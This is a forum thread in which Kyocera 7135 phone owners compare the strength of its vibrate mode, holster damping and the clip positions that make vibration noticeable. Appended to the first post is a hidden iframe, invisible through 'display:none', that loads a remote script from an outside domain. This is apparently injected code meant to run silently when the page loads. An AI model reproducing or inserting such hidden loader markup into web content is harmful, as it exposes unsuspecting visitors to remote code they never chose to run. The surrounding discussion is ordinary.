+ Reply to Thread

Strength of vibrate mode

I am wondering how other 7135 owners feel about the strength of the vibrate mode. I am delighted with the improvement in ringer volume of the 7135 in comparison with the 6035 but not so delighted with the strength of the vibrate mode. If anything, it seems to me the 7135's vibrate mode is less strong than the 6035's. Does the vibrate mode have any sort of strength controls that I am missing in the prefs?

I usually keep my phone on "vibrate 1st then ring" in the incoming calls preferences. I receive a lot of incoming calls and I try to avoid bothering other people when I receive a call. I wish the vibrate mode were just a little stronger (no sexual inuendo please...)<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Dave

Re: Strength of vibrate mode

Originally posted by dwdod
    I am wondering how other 7135 owners feel about the strength of the vibrate mode. I am delighted with the improvement in ringer volume of the 7135 in comparison with the 6035 but not so delighted with the strength of the vibrate mode. If anything, it seems to me the 7135's vibrate mode is less strong than the 6035's. Does the vibrate mode have any sort of strength controls that I am missing in the prefs?

I usually keep my phone on "vibrate 1st then ring" in the incoming calls preferences. I receive a lot of incoming calls and I try to avoid bothering other people when I receive a call. I wish the vibrate mode were just a little stronger (no sexual inuendo please...)
    Are you using the swivel clip or your leather case? I find the vibrate is more then strong enough through the clip, but maybe the leather case is damping it (or isolating it from your body).

Alan

Re: Re: Strength of vibrate mode

Originally posted by alanb
    Are you using the swivel clip or your leather case? I find the vibrate is more then strong enough through the clip, but maybe the leather case is damping it (or isolating it from your body).

Alan
    I'm using the swivel holster that comes with the 7135. I like the holster a lot. It is comfortable to wear and very easy to get the phone out of the holster using just one hand.
    Dave

Re: Re: Re: Strength of vibrate mode

Originally posted by dwdod
    I'm using the swivel holster that comes with the 7135. I like the holster a lot. It is comfortable to wear and very easy to get the phone out of the holster using just one hand.
    We'll need to compare 7135's on Sunday and see if mine has a stronger vibrate mode, or if it is just that I notice it more because of my bony hips...

Alan

I find the vibrate mode too soft and don't rely on it as much as I did with my StarTac. I also use the swivel holster.

Re: Re: Re: Re: Strength of vibrate mode

Originally posted by alanb
    We'll need to compare 7135's on Sunday and see if mine has a stronger vibrate mode, or if it is just that I notice it more because of my bony hips...

Alan
    Looking forward to it! Hopefully there will be at least one activated 6035 at the get together so that we can compare vibrate mode between the two phones.
    Dave

Weak Vibration

Yes, I too find the vibrate mode to be too weak. Especially when I compare it to the way my old StarTAC would shake!

Maybe Kyocera needs an extra stregnth battery for vibration?
    Mark
    ==========================
    Palm Personal > Palm V > Palm Vx > Clie 760 > Kyocera 7135 > Treo 600 >Treo 650 > (Maybe i730??)

Re: Weak Vibration

Originally posted by mdlissner
    Yes, I too find the vibrate mode to be too weak. Especially when I compare it to the way my old StarTAC would shake!

Maybe Kyocera needs an extra stregnth battery for vibration?
    Maybe that's the point == The 7135 is already a batt hog with its color screen, maybe Kyocera purposly set the ringer to be softer (or chose a less power consuming vibration moter) to save power?
    iPhone therefore iAm.

A 7135 and D7A-G in a Civic Hybrid! KB2PMD's Avatar
    That's strange.. my 7135 is replacing a v60i and m515. The vibrate function is *substantially* better than my m515, and about comprable to my v60i.
    If you haven't already, please vote on a bluetooth voice AND data adapter for the 7135 (that plugs into the serial port, leaving your expansion card slot free!)

Administrator
    as you can see, YMMV...

I think it has to do with the tightness of the clip to your body. THe vibrate motor is stong, but in my holster on my belt (which I wear somewhat loose) looses it's strength...

I use the standard hoster and love it, but have noticed that the cut out around the clip (designed to give a little should you snag the phone - very smart) acts like a little shock absorber disguising the vibration to the point that 75% of the time I never noticed it.

I have found that if you rotate the phone forward one notch it makes the vibration much more noticable (It puts weight on the side of the holster which is less impacted by the cut out dampening effect).

I have come to prefer this notch setting better anyway. It is quicker to pull the phone out, I can still see the caller ID, and it makes me feel like little Joe Cartwright (quick on the draw).
    :BigKnife: :thinkerg
    If at first you don't succeed, don't try sky diving.

Originally posted by Steve B.
    I use the standard hoster and love it, but have noticed that the cut out around the clip (designed to give a little should you snag the phone - very smart) acts like a little shock absorber disguising the vibration to the point that 75% of the time I never noticed it.

I have found that if you rotate the phone forward one notch it makes the vibration much more noticable (It puts weight on the side of the holster which is less impacted by the cut out dampening effect).

I have come to prefer this notch setting better anyway. It is quicker to pull the phone out, I can still see the caller ID, and it makes me feel like little Joe Cartwright (quick on the draw).
    :BigKnife: :thinkerg
    That could explain why I think it works well too. I typically have the phone rotated 90 degrees, where the notch doesn't provide any damping effect.

Alan

I wear jeans everyday (yaeh, no suits!) and my 7135 is in my pocket. The vibrate is very strong. The other day I wore some dress pants (chinos, not khakis... khaki is a color, not a type of pants!) and because they are more loose, I missed the vibrate several times. So I guess it really does matter which conditions you have the phone in.
    ~'kito
    pdaPhoneHome Moderator